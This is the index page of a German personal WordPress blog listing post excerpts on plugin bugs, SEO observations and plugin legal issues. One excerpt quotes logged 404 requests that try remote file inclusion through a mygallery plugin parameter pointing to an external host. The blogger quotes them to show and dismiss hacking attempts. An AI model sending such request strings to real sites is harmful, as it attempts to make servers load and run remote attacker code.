SOLVIUM

[Lösung] Fehler durch Breadcrumb NavXT WordPress Plugin

Dienstag, den 13. März 2012

Thomas hat mich netterweise eben auf einen fiesen PHP-Fehler, ausgelöst durch das ansonsten hervorragende WordPress-Plugin Breadcrumb NavXT (Links: WordPress Plugin Directory, Entwickler-Website), aufmerksam gemacht, der einige Beiträge hier komplett zerschossen hat. Die Fehlermeldung lautet Catchable fatal error: Object of class WP_Error could not be converted to string in …/wp-content/plugins/breadcrumb-navxt/breadcrumb_navxt_class.php on line 173

Genau ein Kommentar » | , , , ,

Domain Freshness als Rankingfaktor?

Dienstag, den 24. August 2010

Vor einigen Tagen habe ich eine interessante Beobachtung gemacht: In einem meiner Blogs (Rahmendaten: über 500 Artikel, einige Jahre alt) sind sämtliche Artikel aus den Rankings geflogen, die externe Links enthielten. Merkwürdig, oder? Dazu ist zu sagen, dass die Postingfrequenz in diesem Blog stark heruntergegangen war und nur noch 2-3 Artikel pro Monat erschienen. Die […]

Den ersten Kommentar schreiben » | , , , ,

CommentLuv und wpTwitBox – neue Plugins im Einsatz

Mittwoch, den 7. April 2010

Holla, mir sind in den letzten Tagen zwei WordPress-Plugins aufgefallen, die ab jetzt hier im Blog aktiv sein werden. Es handelt sich dabei um CommentLuv und wpTwitBox. CommentLuv (http://wordpress.org/extend/plugins/commentluv/) fügt im Kommentar-Formular für kommentierende Blogger die Möglichkeit hinzu, die URL zum Feed ihres Blogs anzugeben und damit ihren aktuellen Blogbeitrag unter dem Kommentar verlinkt zu […]

12 Kommentare » | , ,

Tweetsuite TinyURL Fix

Freitag, den 20. November 2009

Ich benutze hier im Blog das Plugin Tweetsuite (TweetSuite WordPress Plugin), um neu geschriebene Beiträge automatisch auch auf Twitter (twitter.com) zu tweeten. Dabei wird die Beitrags-URL in eine TinyURL (tinyurl.com) umgewandelt. Seit ein paar Wochen tat es das aber nicht mehr – am Ende des Tweets fehlte die TinyURL, was den Nutzen des Ganzen deutlich […]

5 Kommentare » | , , , ,

comment-page-1 – WordPress 2.7 hat ein neues „Duplicate Content“-Problem

Donnerstag, den 5. März 2009

Wer nach dem Update auf WordPress 2.7 aufmerksam auf dem eigenen Blog herumklickt, merkt bald, dass sich der Standard-Sprunglink zu den Kommentaren geändert hat. In der Standardeinstellung wird vor das übliche #comment (den Sprung nach unten) ein /comment-page-1/ gemogelt. Das Blöde daran: Der Beitrag ist mit komplett gleichem Inhalt unter zwei unterschiedlichen URLs erreichbar.

3 Kommentare » |

Update auf WordPress 2.7 und No-Nofollow

Freitag, den 27. Februar 2009

Soo, nach ein paar Monate der Warterei (und Faulheit), ist jetzt auch hier WordPress 2.7 (bzw genauer 2.7.1) im Einsatz. Als 2.7 im Dezember erschien, wollte ich erst eventuelle Kinderkrankheiten wie Sicherheitslücken und nicht funktionierende Plugins abwarten; später ergab sich dann keine Gelegenheit mehr fürs Upgrade. Nu ist’s aber problemlos geschafft, und alles werkelt (hoffentlich) […]

Den ersten Kommentar schreiben » | ,

WordPress-Plugin: Abmahnung wegen „Subscribe to Comments“

Montag, den 20. Oktober 2008

Mittlerweile steht es nach einer Tour durch die Blog–Welt auch bei Golem: Der Einsatz des WordPress-Plugins Subscribe to Comments hat beim Upload-Magazin zu einer Abmahnung geführt. Subscribe to Comments ist auch hier im Einsatz und gibt einem kommentierenden User die Möglichkeit, bei weiteren Kommentaren zum gleichen Beitrag eine Benachrichtigung per eMail anzufordern. Dabei wird die […]

5 Kommentare » | , , ,

WordPress hacken – so geht’s (nicht)

Donnerstag, den 18. September 2008

Tjoa, es scheint sich zu lohnen, WordPress-Blogs zu hacken. Zumindest wenn man sich mal so anschaut, welche Anfragen auf nicht-existente Beiträge an der 404-Fehlerseite ankommen (404 ist der Statuscode für ‚Seite nicht gefunden‘). Dort finden sich dann Seitenaufrufe wie /blog/2007/powered-by-ja-woby-eigentlich/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.padellino.com/prc.gif? /blog/2008/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lnx.padellino.com/prc.gif? und viele weitere Versuche der gleichen Bauart. Interessanterweise treten solche Hack-Versuche nicht von einem […]

35 Kommentare » | ,

PHP: Einen Artikel in WordPress einfügen

Dienstag, den 9. September 2008

Um per PHP-Script einen Artikel in ein WordPress-Blog einzufügen – also nicht, wie üblich, über das Backend oder per Mail – reicht ein einfacher Aufruf der WordPress-Funktion wp_insert_post(). Vorher muss ein Array mit den Daten des Beitrags gefüllt werden, z.B. Autor, Titel, Inhalt, Kategorie und Tags, dazu Veröffentlichungszeitpunkt und -status. Die genaue Liste gibt’s weiter […]

5 Kommentare » | , ,

  • Über mich

    Hey, hier bloggt Jan Papenbrock. Ich lebe in Köln.
  • Themen

  • Zeitliches Archiv

  • Aktuelle Kommentare

© 2006-2017 Solvium.de - von und mit Jan Papenbrock - Impressum - Kontakt aufnehmen

» Blog powered by Wordpress. Silk icons von FamFamFam.